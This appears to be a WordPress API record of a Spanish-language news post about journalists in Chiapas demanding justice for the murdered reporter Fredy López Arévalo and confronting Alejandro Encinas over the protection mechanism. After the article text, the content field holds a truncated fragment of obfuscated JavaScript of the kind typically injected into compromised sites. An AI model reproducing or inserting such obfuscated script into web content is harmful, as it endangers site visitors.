{"id":236,"date":"2022-03-07T05:23:32","date_gmt":"2022-03-07T05:23:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=236"},"modified":"2022-03-07T05:23:35","modified_gmt":"2022-03-07T05:23:35","slug":"almendro-encinas-se-compromete-a-atender-tema-de-periodistas-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=236","title":{"rendered":"Almendro Encinas se compromete a atender tema de periodistas en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"449\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-05-at-1.43.52-PM-1024x449.jpeg\" alt=\"\" class=\"wp-image-237\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-05-at-1.43.52-PM-1024x449.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-05-at-1.43.52-PM-300x132.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-05-at-1.43.52-PM-768x337.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-05-at-1.43.52-PM-1536x674.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-05-at-1.43.52-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>06 de Marzo d l.2022. San Crist\u00f3bal de Las Casas.- Alejandro Encinas, subsecretario de Derechos Humanos de la Secretar\u00eda de Gobernaci\u00f3n federal, reiter\u00f3 su compromiso con la familia del periodista Fredy L\u00f3pez Arevalo para que se investigue a fondo y se castigue a responsables y se esclarezca los hechos, durante el Encuentro Nacional de Periodistas en San Crist\u00f3bal. Y tras su participaci\u00f3n por Video Llamada. Durante su intervenci\u00f3n manifest\u00f3 su preocupaci\u00f3n por la situaci\u00f3n que viven los periodistas y reconoci\u00f3 que el sistema de protecci\u00f3n ha salvado vidas, \u201cpero no ha podido evitar la violencia\u201d, pues se necesita hacer reformas a la ley para su protecci\u00f3n, implementaci\u00f3n de un mejor programa del mecanismo de defensa. Espera tener en pr\u00f3ximas fechas, un di\u00e1logo con el gremio period\u00edstico para poder aportar ideas y mejorar la calidad de protecci\u00f3n, y poder tomar todas estas demandas \u201cy por su puesto ser\u00e1n atendidas, ante la inconformidad de los periodistas sobre el mecanismo de protecci\u00f3n a periodistas que fue vinculado a Genaro Garc\u00eda Luna en donde informaci\u00f3n personal de ellos se infiltraba\u201d. Es de mencionar los asistentes reclamaron al funcionario federal su ausencia, ya que muchos hicieron un viaje largo para entablar comunicaci\u00f3n con \u00e9l para exponerle la situaci\u00f3n del gremio, donde en muchas partes del pa\u00eds, se violan sus derechos laborales y viven en un contexto de amenazas y violencia, pero a pesar de que Andr\u00e9s Manuel L\u00f3pez Obrador le instruy\u00f3 asistir al evento organizado por familiares del periodista asesinado el 28 de octubre de 2021, Fredy L\u00f3pez Ar\u00e9valo. Adriana Urrea expuso la situaci\u00f3n de la huelga de Notimex, que es la m\u00e1s larga en la historia del periodismo en M\u00e9xico, donde expuso el hostigamiento y persecuci\u00f3n que han sufrido a lo largo de este movimiento. Asimismo, \u00d3scar Takeshi L\u00f3pez Moreno, detall\u00f3 las falacias creadas por las autoridades sobre el asesinato de su padre, donde evidentemente quieren darle \u201ccarpetazo\u201d al caso. El micr\u00f3fono se abri\u00f3 para periodistas chiapanecos y de otras partes de la Rep\u00fablica, para que expusieron casos espec\u00edficos, y fue en ese espacio, que se le reclam\u00f3 a Encinas por su ausencia, lo cual provoc\u00f3 una sonrisa en su rostro, causando molestia entre los asistentes, que incluso pidieron la renuncia de varios funcionarios de la Cuarta Transformaci\u00f3n. En entrevista previa al evento, Jorge L\u00f3pez Ar\u00e9valo, habl\u00f3 tambi\u00e9n sobre el caso de su hermano, donde destac\u00f3 que las autoridades todav\u00eda no tienen un m\u00f3vil del crimen, pero aseguran que el autor intelectual y material est\u00e1n muertos. \u201cEs una ofensa a nuestra inteligencia, esa explicaci\u00f3n es una tonter\u00eda por los cuatro costados\u201d. \u201cEl mensaje como familia es que se nos d\u00e9 el mismo trato, como el caso de los periodistas asesinados en Tijuana, que haya una comisi\u00f3n especial, que se encargue de investigar este asesinato, porque no puede quedar impune, porque la impunidad es lo que ha hecho que crezca la violencia contra el gremio\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 06 de Marzo d l.2022. San Crist\u00f3bal de Las Casas.- Alejandro Encinas, subsecretario de Derechos Humanos de la Secretar\u00eda de Gobernaci\u00f3n federal, reiter\u00f3 su compromiso con la familia del periodista Fredy L\u00f3pez Arevalo para que se investigue a fondo y se castigue a responsables y se esclarezca los hechos, durante el Encuentro Nacional &hellip;<\/p>\n","protected":false},"author":2,"featured_media":237,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-236","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/236","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=236"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/236\/revisions"}],"predecessor-version":[{"id":238,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/236\/revisions\/238"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/237"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=236"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}